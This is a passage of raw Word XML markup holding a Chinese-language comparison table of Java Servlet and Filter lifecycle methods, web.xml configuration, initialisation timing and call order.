            <w:r w:rsidRPr="00F64839">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="555555"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F64839" w:rsidRPr="00F64839" w:rsidRDefault="00F64839" w:rsidP="00F64839">
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:line="350" w:lineRule="atLeast"/>
              <w:ind w:left="540"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="555555"/>
                <w:kern w:val="0"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00F64839" w:rsidRPr="00F64839" w:rsidRDefault="00F64839" w:rsidP="00F64839">
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:line="350" w:lineRule="atLeast"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="555555"/>
                <w:kern w:val="0"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F64839">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="555555"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
            <w:r w:rsidRPr="00F64839">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="555555"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>、配置</w:t>
            </w:r>
            <w:r w:rsidRPr="00F64839">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="555555"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>WEB-INF/web.xml</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5481"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F64839" w:rsidRPr="00F64839" w:rsidRDefault="00F64839" w:rsidP="00F64839">
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:line="350" w:lineRule="atLeast"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="555555"/>
                <w:kern w:val="0"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F64839">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="FF0000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidRPr="00F64839">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="FF0000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>、创建类，继承接口</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F64839" w:rsidRPr="00F64839" w:rsidRDefault="00F64839" w:rsidP="00F64839">
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:line="350" w:lineRule="atLeast"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="555555"/>
                <w:kern w:val="0"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F64839">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="555555"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r w:rsidRPr="00F64839">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="555555"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>、实现方法</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F64839" w:rsidRPr="00F64839" w:rsidRDefault="00F64839" w:rsidP="00F64839">
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:line="350" w:lineRule="atLeast"/>
              <w:ind w:left="540"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="555555"/>
                <w:kern w:val="0"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F64839">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="FF0000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>init()</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F64839" w:rsidRPr="00F64839" w:rsidRDefault="00F64839" w:rsidP="00F64839">
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:line="350" w:lineRule="atLeast"/>
              <w:ind w:left="540"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="555555"/>
                <w:kern w:val="0"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F64839">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="555555"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>service()</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F64839" w:rsidRPr="00F64839" w:rsidRDefault="00F64839" w:rsidP="00F64839">
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:line="350" w:lineRule="atLeast"/>
              <w:ind w:left="540"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="555555"/>
                <w:kern w:val="0"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F64839">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="FF0000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>destroy()</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F64839" w:rsidRPr="00F64839" w:rsidRDefault="00F64839" w:rsidP="00F64839">
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:line="350" w:lineRule="atLeast"/>
              <w:ind w:left="540"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="555555"/>
                <w:kern w:val="0"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F64839">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="555555"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>getServletConfig()</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F64839" w:rsidRPr="00F64839" w:rsidRDefault="00F64839" w:rsidP="00F64839">
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:line="350" w:lineRule="atLeast"/>
              <w:ind w:left="540"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="555555"/>
                <w:kern w:val="0"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F64839">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="555555"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>getServletInfo()</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F64839" w:rsidRPr="00F64839" w:rsidRDefault="00F64839" w:rsidP="00F64839">
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:line="350" w:lineRule="atLeast"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="555555"/>
                <w:kern w:val="0"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F64839">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="555555"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
            <w:r w:rsidRPr="00F64839">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="555555"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>、配置</w:t>
            </w:r>
            <w:r w:rsidRPr="00F64839">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="555555"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>WEB-INF/web.xml</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F64839" w:rsidRPr="00F64839" w:rsidTr="00F64839">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1587"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F64839" w:rsidRPr="00F64839" w:rsidRDefault="00F64839" w:rsidP="00F64839">
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:line="350" w:lineRule="atLeast"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
                <w:color w:val="555555"/>
                <w:kern w:val="0"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F64839">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
                <w:color w:val="555555"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>初始化时间</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5053"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F64839" w:rsidRPr="00F64839" w:rsidRDefault="00F64839" w:rsidP="00F64839">
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:line="350" w:lineRule="atLeast"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="555555"/>
                <w:kern w:val="0"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F64839">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="555555"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Servlet</w:t>
            </w:r>
            <w:r w:rsidRPr="00F64839">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="FF0000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>容器启动之后</w:t>
            </w:r>
            <w:r w:rsidRPr="00F64839">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="555555"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>即初始化</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5481"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F64839" w:rsidRPr="00F64839" w:rsidRDefault="00F64839" w:rsidP="00F64839">
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:line="350" w:lineRule="atLeast"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="555555"/>
                <w:kern w:val="0"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F64839">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="555555"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Servlet</w:t>
            </w:r>
            <w:r w:rsidRPr="00F64839">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="FF0000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>类被调用之后</w:t>
            </w:r>
            <w:r w:rsidRPr="00F64839">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="555555"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>初始化、先于</w:t>
            </w:r>
            <w:r w:rsidRPr="00F64839">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="555555"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Filter</w:t>
            </w:r>
            <w:r w:rsidRPr="00F64839">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="555555"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>调用。</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F64839" w:rsidRPr="00F64839" w:rsidRDefault="00F64839" w:rsidP="00F64839">
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:line="350" w:lineRule="atLeast"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="555555"/>
                <w:kern w:val="0"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F64839">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="555555"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>初始化可以在容器启动后被调用但需要配置。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F64839" w:rsidRPr="00F64839" w:rsidTr="00F64839">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1587"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F64839" w:rsidRPr="00F64839" w:rsidRDefault="00F64839" w:rsidP="00F64839">
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:line="350" w:lineRule="atLeast"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
                <w:color w:val="555555"/>
                <w:kern w:val="0"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F64839">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
                <w:color w:val="555555"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>调用顺序</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5053"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F64839" w:rsidRPr="00F64839" w:rsidRDefault="00F64839" w:rsidP="00F64839">
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:line="350" w:lineRule="atLeast"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="555555"/>
                <w:kern w:val="0"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F64839">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="555555"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>1.</w:t>
            </w:r>
            <w:r w:rsidRPr="00F64839">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="FF0000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r w:rsidRPr="00F64839">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="FF0000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>按照</w:t>
            </w:r>
            <w:r w:rsidRPr="00F64839">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="FF0000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>web.xml</w:t>
            </w:r>
            <w:r w:rsidRPr="00F64839">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="FF0000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>中的映射配置顺序按照配置条件从后向前调用</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F64839" w:rsidRPr="00F64839" w:rsidRDefault="00F64839" w:rsidP="00F64839">
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:line="350" w:lineRule="atLeast"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="555555"/>
                <w:kern w:val="0"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F64839">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="555555"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">2. </w:t>
            </w:r>
            <w:r w:rsidRPr="00F64839">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="555555"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>层次调用</w:t>
            </w:r>
            <w:r w:rsidRPr="00F64839">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="555555"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>doFilter()</w:t>
            </w:r>
            <w:r w:rsidRPr="00F64839">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="555555"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>方法中</w:t>
            </w:r>
            <w:r w:rsidRPr="00F64839">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="555555"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>FilterChain.doFilter</w:t>
            </w:r>
            <w:r w:rsidRPr="00F64839">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="555555"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>（）之前的内容</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F64839" w:rsidRPr="00F64839" w:rsidRDefault="00F64839" w:rsidP="00F64839">
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:line="350" w:lineRule="atLeast"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="555555"/>
                <w:kern w:val="0"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F64839">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="555555"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">3. </w:t>
            </w:r>
            <w:r w:rsidRPr="00F64839">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="555555"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>调用</w:t>
            </w:r>
            <w:r w:rsidRPr="00F64839">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="555555"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Servlet</w:t>
            </w:r>
            <w:r w:rsidRPr="00F64839">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="555555"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>中的</w:t>
            </w:r>
            <w:r w:rsidRPr="00F64839">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="555555"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>service()</w:t>
            </w:r>
            <w:r w:rsidRPr="00F64839">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="555555"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>方法</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F64839" w:rsidRPr="00F64839" w:rsidRDefault="00F64839" w:rsidP="00F64839">
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:line="350" w:lineRule="atLeast"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="555555"/>
                <w:kern w:val="0"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F64839">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="555555"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>4. service</w:t>
            </w:r>
            <w:r w:rsidRPr="00F64839">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="555555"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>方法执行完毕后，层次调用</w:t>
            </w:r>
            <w:r w:rsidRPr="00F64839">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="555555"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>doFilter()</w:t>
            </w:r>
            <w:r w:rsidRPr="00F64839">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="555555"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>中</w:t>
            </w:r>
            <w:r w:rsidRPr="00F64839">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="555555"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>FilterChain.doFilter()</w:t>
            </w:r>
            <w:r w:rsidRPr="00F64839">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="555555"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>之后的方法，顺序与之前的相反</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F64839" w:rsidRPr="00F64839" w:rsidRDefault="00F64839" w:rsidP="00F64839">
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:line="350" w:lineRule="atLeast"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="555555"/>
                <w:kern w:val="0"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F64839">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="555555"/>
                <w:kern w:val="0"/>
